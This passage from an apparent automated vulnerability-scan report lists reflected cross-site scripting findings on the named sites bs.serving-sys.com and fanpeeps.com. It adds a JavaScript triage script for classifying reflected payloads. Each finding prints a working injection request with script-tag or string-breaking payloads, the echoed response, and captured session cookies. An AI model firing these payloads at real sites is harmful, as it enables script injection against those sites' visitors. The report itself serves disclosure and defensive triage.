Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:47 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2396

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
-1";ebO.dg="-1";ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("");ebO.ju=escape(ebTokens("http://www.spdr-etfs.com/dividends/"));ebO.ncu=escape("4cbdc</script><script>alert(1)</script>050f40894a4");ebO.iu=escape("Site-32294/Type-0/de700f0e-3d61-4dad-b19e-d31e16498ac6.gif");ebO.fu=escape("Site-32294/Type-2/6bca92d7-18a2-4321-a55b-7a6fac5e805b.swf");ebO.fv=10;var ebFN="StdBanner";if(0==1)ebFN+="
...[SNIP]...

4.53. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the npu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0bb"><script>alert(1)</script>7368fdb59ee was submitted in the npu parameter. This input was echoed as bf0bb\"><script>alert(1)</script>7368fdb59ee in the application's response. The added backslash shows that the server applied JavaScript-string style escaping before writing the value into markup; an HTML parser does not treat a backslash as an escape character, so the double quote still terminates the SRC attribute and the script element that follows is parsed normally. Escaping has to match the context the value is actually written into (here an HTML attribute), not the one the developer had in mind.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$bf0bb"><script>alert(1)</script>7368fdb59ee&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2571

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<IMG SRC="$$bf0bb\"><script>alert(1)</script>7368fdb59ee&ncu=" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

4.54. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the npu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 163bd</script><script>alert(1)</script>6281c404d32 was submitted in the npu parameter. This input was echoed unmodified in the application's response. As in 4.52, the injected </script> ends the script element while it is being parsed, so nothing the script does with the value afterwards (ebTokens, document.write) can intervene.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=&npu=$$$$163bd</script><script>alert(1)</script>6281c404d32&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:46 GMT
Connection: close
Content-Length: 2583

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
ace(/\[ebRandom\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4772648).replace(/\[%tp_flightid%\]/ig,2319721).replace(/\[%tp_campaignid%\]/ig,143901);}var strNPU=ebTokens("$$163bd</script><script>alert(1)</script>6281c404d32&ncu=");document.write("<IMG SRC="+strNPU+" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

4.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c682f"%3balert(1)//e44e08c8f5b was submitted in the p parameter; the server decoded the %3b to a semicolon, so the value was echoed as c682f";alert(1)//e44e08c8f5b in the application's response and the injected statement runs before the escape() call ever sees it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=c682f"%3balert(1)//e44e08c8f5b&npu=$$$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:45 GMT
Connection: close
Content-Length: 2843

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.ta="-1";ebO.dg="-1";ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-sys.com");ebO.p=escape("c682f";alert(1)//e44e08c8f5b");ebO.ju=escape(ebTokens("http://www.spdr-etfs.com/dividends/"));ebO.ncu=escape("http://ad.doubleclick.net/click;h=v8/3b07/3/0/*/v;240157455;0-0;0;13112524;4307-300/250;41771240/41789027/1;u=^^;~okv=;
...[SNIP]...

4.56. http://bs.serving-sys.com/BurstingPipe/adServer.bs [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bc52'><script>alert(1)</script>19b91e4c95 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BurstingPipe/adServer.bs?cn=sb&c=17&pli=2319721&PluID=0&w=300&h=250&ord=3142682&ifrm=1&p=5bc52'><script>alert(1)</script>19b91e4c95&npu=$$$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/v%3B240157455%3B0-0%3B0%3B13112524%3B4307-300/250%3B41771240/41789027/1%3Bu%3D%5E%5E%3B%7Eokv%3D%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D233%3Bu%3D%5E%5E%3Bbiz%3D1053%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3Btile%3D6%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/cdn_content/business/re.html?ad_DisplayAd1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C_4248=4844349; C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPj0cOm00001iuIZaMPl0aMI00001jxYPaMPg0doZ00001; B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD9fOJ0000000001uC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iuIZaMPl0aMI00001idcEaMPA0cEt00001jxYPaMPg0doZ00001; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9xx40000000001uD8Yi+0000000001uD9sKa0000000001uD8SlF0000000001uD9fOJ0000000001uC; expires=Fri, 12-Aug-2011 06:28:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 14 May 2011 10:28:45 GMT
Connection: close
Content-Length: 2893

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...
<img src='http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2319721&Page=5bc52'><script>alert(1)</script>19b91e4c95&PluID=0&EyeblasterID=4772648&Pos=406772216914548&ord=[timestamp]' border=0 width=300 height=250>
...[SNIP]...

4.57. http://fanpeeps.com/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d860e'><script>alert(1)</script>a93ef963722 was submitted in the action parameter. This input was echoed as d860e\'><script>alert(1)</script>a93ef963722 in the application's response. The backslash is consistent with addslashes()-style escaping (PHP's magic_quotes_gpc, plausible given the PHP/5.2.5 server header, behaves this way), which targets SQL and JavaScript string literals; it means nothing to an HTML parser, so the single quote still closes the value attribute and the script element is parsed. The fix is htmlspecialchars()-style output encoding with ENT_QUOTES, not more backslashes.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=newsd860e'><script>alert(1)</script>a93ef963722&pid=18&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:03 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 45886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value='newsd860e\'><script>alert(1)</script>a93ef963722'>
...[SNIP]...
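
The findings above are easier to read with a small triage step in hand: how did the probe come back, what sink did it land in, and is the response one a browser would render as HTML at all (4.48 and 4.49 are application/json and text/plain; 4.53 and 4.57 carry a backslash that an HTML parser ignores). The following is an added example, not code from the XSS.CX report, from Burp Suite or from any of the sites named; every function name is this example's own, and the SAMPLES are constructed here, with bodies abridged from findings 4.49, 4.53, 4.54 and 4.57 plus two hypothetical variants that show what an escaped JS string and a properly encoded attribute would have looked like.

```javascript
// Added example, not code from the XSS.CX report, Burp Suite or any site named
// above. A probe is random prefix + payload + random suffix (the report's shape);
// for a raw response we decide how the payload came back, what sink it landed
// in, and whether a browser would render the response as HTML at all.
// SAMPLES are constructed: bodies abridged from findings 4.49, 4.53, 4.54 and
// 4.57, plus two hypothetical variants. All function names are this example's own.

const HTML_TYPES = new Set(["text/html", "application/xhtml+xml"]);

// Split a raw HTTP response into a lower-cased header map and the body.
function parseResponse(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const headers = {};
  for (const line of head.split("\r\n").slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { headers, body: sep === -1 ? "" : raw.slice(sep + 4) };
}

// "text/html; charset=utf-8" -> "text/html"
const mediaType = headers => (headers["content-type"] || "").split(";")[0].trim().toLowerCase();

// Find prefix...suffix in the body and compare what lies between with the payload.
function classifyEcho(body, { prefix, payload, suffix }) {
  const start = body.indexOf(prefix);
  const from = start + prefix.length;
  const end = start === -1 ? -1 : body.indexOf(suffix, from);
  if (end === -1) return { echo: "absent", pos: -1, reflected: null };
  const reflected = body.slice(from, end);
  let echo = "transformed";
  if (reflected === payload) echo = "unmodified";
  else if (reflected === payload.replace(/(['"\\])/g, "\\$1")) echo = "backslash-escaped"; // addslashes() style
  else if (/&(lt|gt|quot|#0?39|#x27|amp);/i.test(reflected)) echo = "html-encoded";
  else if (/%3[ce]|%2[27]/i.test(reflected)) echo = "url-encoded";
  return { echo, pos: start, reflected };
}

// Crude sink detection in an HTML body: inside a tag (an attribute value),
// inside an open <script> element, or in ordinary text.
function sinkContext(body, pos) {
  const before = body.slice(0, pos);
  if (before.lastIndexOf("<") > before.lastIndexOf(">")) return "tag";
  const opens = (before.match(/<script\b/gi) || []).length;
  const closes = (before.match(/<\/script\s*>/gi) || []).length;
  return opens > closes ? "script" : "text";
}

function triage(raw, probe) {
  const { headers, body } = parseResponse(raw);
  const contentType = mediaType(headers);
  const rendersAsHtml = HTML_TYPES.has(contentType);
  const { echo, pos, reflected } = classifyEcho(body, probe);
  const context = echo === "absent" ? null : rendersAsHtml ? sinkContext(body, pos) : "non-html";
  let verdict;
  if (echo === "absent") verdict = "not-reflected";
  else if (echo === "html-encoded" || echo === "url-encoded") verdict = "neutralised";
  else if (!rendersAsHtml) verdict = "reflected-non-html"; // runs only where a page loads this URL as a script
  else if (echo === "unmodified") verdict = "exploitable";
  else if (echo === "backslash-escaped" && context === "script")
    // \" keeps the JS string literal closed, but a </script> still ends the element
    verdict = /<\/script/i.test(reflected) ? "exploitable" : "quote-neutralised-in-js-string";
  else if (echo === "backslash-escaped") verdict = "exploitable"; // backslash is not an escape in markup
  else verdict = "manual-review";
  return { contentType, rendersAsHtml, echo, context, verdict };
}

const H = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n";
const SAMPLES = {
  apiKey: { // 4.49: intact, but the body is text/plain
    raw: "HTTP/1.1 403 Forbidden\r\nContent-Type: text/plain\r\n\r\nUnknown API key: (r9t72482usanbp6sphprhvun79904<script>alert(1)</script>02362a720da)",
    probe: { prefix: "79904", payload: "<script>alert(1)</script>", suffix: "02362a720da" } },
  npuAttr: { // 4.53: backslash added, but the sink is an IMG SRC attribute
    raw: H + '<HTML><Body><IMG SRC="$$bf0bb\\"><script>alert(1)</script>7368fdb59ee&ncu=" width=0 height=0>',
    probe: { prefix: "bf0bb", payload: '"><script>alert(1)</script>', suffix: "7368fdb59ee" } },
  npuScript: { // 4.54: unmodified inside a JS string; </script> ends the element
    raw: H + '<HTML><Body><Script>var strNPU=ebTokens("$$163bd</script><script>alert(1)</script>6281c404d32&ncu=");</Script>',
    probe: { prefix: "163bd", payload: "</script><script>alert(1)</script>", suffix: "6281c404d32" } },
  action: { // 4.57: backslash added inside a single-quoted attribute
    raw: H + "<html><body><input type=hidden name=action value='newsd860e\\'><script>alert(1)</script>a93ef963722'></body></html>",
    probe: { prefix: "d860e", payload: "'><script>alert(1)</script>", suffix: "a93ef963722" } },
  pSlashed: { // hypothetical: 4.55's sink if the server had applied addslashes()
    raw: H + '<HTML><Body><Script>ebO.p=escape("c682f\\";alert(1)//e44e08c8f5b");</Script>',
    probe: { prefix: "c682f", payload: '";alert(1)//', suffix: "e44e08c8f5b" } },
  actionEncoded: { // hypothetical: 4.57's sink with htmlspecialchars()-style encoding
    raw: H + "<html><body><input type=hidden name=action value='newsd860e&#039;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a93ef963722'></body></html>",
    probe: { prefix: "d860e", payload: "'><script>alert(1)</script>", suffix: "a93ef963722" } },
};

for (const [name, s] of Object.entries(SAMPLES)) console.log(name, triage(s.raw, s.probe));
```

Run with node: the 4.49 sample comes out reflected-non-html, the two backslash cases split by sink (attribute: exploitable; JS string: quote neutralised), the 4.54 sample is exploitable because the </script> survives, and the entity-encoded variant is the only one that is neutralised in an HTML body. The sink detection is deliberately crude (it ignores comments and CDATA) and is a first filter, not a substitute for reading the response.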

4.58. http://fanpeeps.com/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 611c2><script>alert(1)</script>1a9e8006079 was submitted in the action parameter. This input was echoed unmodified in the application's response. With an unquoted attribute no quote character is needed: a > ends the tag, and the backslash escaping seen in 4.57 does not even come into play. Whitespace alone starts a new attribute, so an unquoted value also lets an attacker add event-handler attributes without any angle bracket; the fix is to quote every attribute value and HTML-encode it.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news611c2><script>alert(1)</script>1a9e8006079&pid=18&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 45880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value=news611c2><script>alert(1)</script>1a9e8006079>
...[SNIP]...

4.59. http://fanpeeps.com/ [idol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the idol request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 693c9"><script>alert(1)</script>efaf97ed0bd was submitted in the idol parameter. This input was echoed as 693c9\"><script>alert(1)</script>efaf97ed0bd in the application's response. As in 4.57, the backslash is not an escape character in HTML, so the double quote still closes the href attribute; a value placed in a URL should be URL-encoded first and then HTML-encoded for the attribute, not backslash-escaped.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=18&idol=1693c9"><script>alert(1)</script>efaf97ed0bd HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=18&idol=1693c9\"><script>alert(1)</script>efaf97ed0bd&action=tweets">
...[SNIP]...

4.60. http://fanpeeps.com/ [idol parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the idol request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 562ed><script>alert(1)</script>c231ddca073 was submitted in the idol parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=18&idol=1562ed><script>alert(1)</script>c231ddca073 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
